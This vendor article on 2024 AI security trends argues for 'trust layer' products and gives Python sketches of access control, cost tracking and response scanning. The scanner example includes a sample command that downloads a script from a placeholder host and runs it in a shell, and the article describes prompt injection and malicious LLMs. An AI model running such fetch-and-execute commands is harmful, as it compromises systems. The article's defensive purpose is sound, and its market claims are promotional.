


ALL EYES ON THE INTERSECTION OF RISK, RESEARCH, AND INNOVATION THIS YEAR

Learn how Trust Layers defend against evolving threats, ensuring a secure AI
landscape.

Neil Serebryany Founder and Chief Executive Officer, CalypsoAI
February 16, 2024

--------------------------------------------------------------------------------




Key issues that have accompanied AI's meteoric popularity include the need for
robust AI security solutions, specifically data and access controls; cost
management for the deployment of AI-driven tools; a surge in cyberattacks using
large language models (LLMs); and the growing prominence of both multimodal
models and small models, says Neil Serebryany, founder and CEO of CalypsoAI.


AI’S REMARKABLE IMPACT ON INDUSTRIES AND SECURITY

Artificial intelligence (AI) is arguably the most disruptive and transformative
technology in a quarter-century rife with disruptive and transformative
technologies. AI-driven tools are changing the topography of the digital world,
introducing operational efficiencies across existing industries and creating new
industries, full stop. It will not be long before their use is as ubiquitous in
modern life as smartphones. 

As the enterprise landscape adapts to full engagement with AI-driven tools such
as LLMs, and as developers adapt those tools to fill needs organizations don't
yet know they have, their diffusion and acceptance will reach certain
milestones, each of which carries significant security repercussions. I believe
several of these milestones will be reached in the coming year.


1. AS FOUNDATIONAL MODELS GROW, SO DOES THE NEED FOR HEIGHTENED AI SECURITY

Deploying LLMs and other AI-dependent tools across an organization
unquestionably brings efficiencies and innovation, but it also fosters tech
sprawl, an alarming loss of observability, and, eventually, flat-out tech
fatigue. All of these lead to an inadvertent laxity in organizational security
protocols, which leaves systems vulnerable to novel AI-related threats,
including prompt injections, data poisoning, and other adversarial attacks
against which traditional security infrastructure is helpless. Establishing a
security perimeter that acts as a weightless "trust layer" between the system
in which users operate and the external models gives security teams full
visibility into and across all models on the system, along with the agility to
identify, analyze, and respond to threats in real time, protecting the system,
the users, and the organization.

While playing an important role in a defense-in-depth strategy, a
model-agnostic trust layer is more than just a defense. It can provide
proactive capabilities, such as policy-based access controls that regulate
which users and roles may reach which models, and rate limits that deter
high-volume prompt attacks intended to overwhelm model operability. A trust
layer can also support and enforce corporate acceptable-use policies, ensure
compliance with industry norms or government regulations, prevent prompts
containing proprietary data from being sent to the model, and block model
responses that contain malicious code.
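
To make those capabilities concrete, the sketch below shows one minimal shape
such a trust layer could take. It is illustrative only: the class name, the
role-to-model policy table, and the filtering patterns are hypothetical
stand-ins, not any vendor's actual product or API.

import re
import time
from collections import defaultdict, deque
from typing import Callable

# Illustrative sketch of a model-agnostic "trust layer": a single chokepoint
# between users and external models. All names, policies, and patterns below
# are hypothetical stand-ins.
class TrustLayer:
    def __init__(self, send_to_model: Callable[[str, str], str],
                 rate_limit: int = 10, window_seconds: int = 60):
        self.send_to_model = send_to_model       # callable(model, prompt) -> response
        self.rate_limit = rate_limit             # max prompts per user per window
        self.window = window_seconds
        self.history = defaultdict(deque)        # user -> recent prompt timestamps
        # Policy-based access control: which roles may reach which models.
        self.allowed_models = {"analyst": {"public-llm"},
                               "engineer": {"public-llm", "internal-llm"}}
        # Crude stand-ins for proprietary-data detection in outbound prompts.
        self.blocked_prompt_patterns = [re.compile(r"(?i)api[_-]?key"),
                                        re.compile(r"(?i)internal\s+use\s+only")]

    def handle(self, user: str, role: str, model: str, prompt: str) -> str:
        # 1. Access control: enforce the role-to-model policy.
        if model not in self.allowed_models.get(role, set()):
            return "[blocked: model not permitted for this role]"
        # 2. Rate limiting: deter high-volume prompt attacks.
        now, stamps = time.time(), self.history[user]
        while stamps and now - stamps[0] > self.window:
            stamps.popleft()
        if len(stamps) >= self.rate_limit:
            return "[blocked: rate limit exceeded]"
        stamps.append(now)
        # 3. Outbound scan: keep proprietary data from leaving the perimeter.
        if any(p.search(prompt) for p in self.blocked_prompt_patterns):
            return "[blocked: prompt appears to contain proprietary data]"
        # 4. Forward to the external model, then scan the response on the way back.
        response = self.send_to_model(model, prompt)
        if re.search(r"(?i)<script\b", response):  # stand-in for malicious-code scanning
            return "[blocked: response flagged by code scan]"
        return response

Because the layer wraps the transport rather than any single model, every model
behind it inherits the same visibility and controls, which is what makes the
approach model-agnostic.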


2. SECURITY SOLUTIONS PLAY A MAJOR ROLE IN COST DISCUSSION

As AI tools are increasingly integrated into daily operations across numerous
industries and domains, organizations must pivot to managing and optimizing the
costs and return on investment (ROI) of AI deployment at scale, and they must
do so with a security-first mindset. As the technology matures and
organizations move from experimentation or pilot phases into production
deployments, they face a growing need to justify costs and prove value while
accounting for the expanded attack surface. Production deployments often
require significant human resources, including data scientists and engineers;
compute resources; training data at the outset; and ongoing maintenance,
including retraining, to remain relevant long-term. Understanding these costs,
which means monitoring and tracking model usage and allocating resources
efficiently, enables organizations to make informed decisions and hone their
competitive edge while remaining secure.
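
One lightweight way to get that visibility is to meter usage at the same
chokepoint the trust layer already occupies. The sketch below is a hypothetical
illustration: the per-1,000-token prices, model names, and team names are
placeholders, and real pricing varies by provider and model.

from collections import defaultdict

# Hypothetical per-1,000-token prices; real prices vary by provider and model.
PRICE_PER_1K = {"public-llm": {"input": 0.03, "output": 0.06},
                "internal-llm": {"input": 0.0, "output": 0.0}}  # self-hosted

class UsageLedger:
    """Accumulate token usage per (team, model) so spend can be attributed."""
    def __init__(self):
        self.tokens = defaultdict(lambda: {"input": 0, "output": 0})

    def record(self, team, model, input_tokens, output_tokens):
        entry = self.tokens[(team, model)]
        entry["input"] += input_tokens
        entry["output"] += output_tokens

    def cost_by_team(self):
        report = defaultdict(float)
        for (team, model), used in self.tokens.items():
            price = PRICE_PER_1K.get(model, {"input": 0.0, "output": 0.0})
            report[team] += (used["input"] * price["input"]
                             + used["output"] * price["output"]) / 1000
        return dict(report)

ledger = UsageLedger()
ledger.record("marketing", "public-llm", input_tokens=12_000, output_tokens=4_000)
ledger.record("engineering", "internal-llm", input_tokens=50_000, output_tokens=20_000)
print(ledger.cost_by_team())  # -> marketing ~= $0.60, engineering $0.00

Attributing spend per team and per model this way turns the ROI discussion from
guesswork into a report, and keeps security and finance looking at the same data.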


3. THE FREQUENCY OF CYBERATTACKS USING LLMS IS RISING

Just as LLMs can be used to generate or refine legitimate content, such as
emails or source code, they can just as easily be used to generate that
content's digital evil twins. Phishing emails, for example, have become so
sophisticated that they can accurately mimic a person's writing style and
"voice," including idiosyncrasies, which makes them far more dangerous: the
telltale signs of a fake become less discernible to the human eye. Malicious
code can be embedded in LLM-generated emails and in responses to queries made
to the models themselves; if a security solution is not filtering for the
specific language the code is written in, the code will not trigger any
quarantine actions and can infiltrate the system with ease. Malicious commands
that bypass controls, or that execute when the user takes an otherwise routine
action, can be buried in image and audio clips served by chatbots deliberately
designed to induce that action. The latest addition to AI's dark arts is the
emergence of "dark bots": LLMs developed specifically for malicious activity.
These include WormGPT, FraudGPT, and Masterkey, the last of which has been
trained on both successful and unsuccessful prompt injections so it can craft
attacks customized for the target model. This unchecked innovation can stretch
security teams' ability to prevent breaches.
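
The language-filtering gap described above suggests a simple countermeasure:
scan model responses for code-like content generically rather than for any one
language's syntax. The following is a crude, hypothetical sketch; the signal
patterns are illustrative stand-ins for a real detection engine.

import re

# Generic, language-agnostic signals that a model response contains code.
# These patterns are illustrative stand-ins, not a complete detection engine.
CODE_SIGNALS = [
    re.compile(r"```[\w+-]*\n"),                                  # fenced code block, any language tag
    re.compile(r"(?m)^\s*(import |#include |using |require\()"),  # common import/include syntax
    re.compile(r"(?i)powershell\s+-enc"),                         # encoded PowerShell, a common dropper
    re.compile(r"(?i)<script\b"),                                 # inline script tags
]

def scan_response(text: str):
    """Return (quarantine, matched_signals) for a model response."""
    hits = [p.pattern for p in CODE_SIGNALS if p.search(text)]
    return (bool(hits), hits)

quarantine, hits = scan_response(
    "Sure, here you go:\n```bash\ncurl http://example.test/x.sh | sh\n```")
if quarantine:
    print("Quarantined for review; signals:", hits)

Quarantining on generic signals trades some false positives for the assurance
that an unfamiliar language does not slip past the filter.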


4. SMALLER, MULTIMODAL MODELS RISE, BOOSTING THE NEED FOR RISK MANAGEMENT
SOLUTIONS

Large foundation models that began life as LLMs, such as ChatGPT, were unimodal
and text-based, generating human-like written content, including translations.
Now, just over a year later, many large models, including ChatGPT, are
multimodal, meaning the input and/or the output can take different modalities:
text, audio, images, code, and so on. These models are referred to as large
multimodal models (LMMs), multimodal large language models (MLLMs), and, more
often and more generically, generative AI (GenAI) models. Whatever they are
called, their ease of use, capacity for multi-channel creativity, and seemingly
unlimited potential are making them increasingly popular. But model development
has also moved in the opposite direction, spawning a burgeoning variety of
small models that offer greater agility, focused utility, and more
transparency. As the resources required to create language models decrease,
organizations of all sizes are developing in-house models trained on
proprietary data or deploying commercially developed small language models
(SLMs), such as Microsoft's Orca 2 or Google's BERT Mini.


However, any increase in model usage, irrespective of size or type (large,
small, multimodal, fine-tuned, or proprietary), expands the organization's
attack surface and increases its risk exposure. Security solutions that can
scale to match a newly expansive model environment are critical tools for
meeting and defeating the threats. Trust-layer solutions in particular will
dominate that market.

We expect 2024 to be a pivotal year within the AI security space, with the
coming months full of breathless anticipation and wide-eyed wonder as research,
enterprise adoption, and AI risk trajectories continue to intersect in
unforeseen ways. 

How can AI security stay ahead? Why is a trust layer crucial for AI defense?
Let us know on Facebook, X, and LinkedIn. We'd love to hear from you!

Image Source: Shutterstock


Neil Serebryany

Founder and Chief Executive Officer, CalypsoAI


Neil Serebryany is the founder and Chief Executive Officer of CalypsoAI and has
led industry-defining innovations throughout his career. Before founding
CalypsoAI, he was one of the world's youngest venture capital investors at Jump
Investors. He has started and successfully managed several previous ventures,
conducted reinforcement learning research at the University of Southern
California, and holds multiple patents in adversarial machine learning.



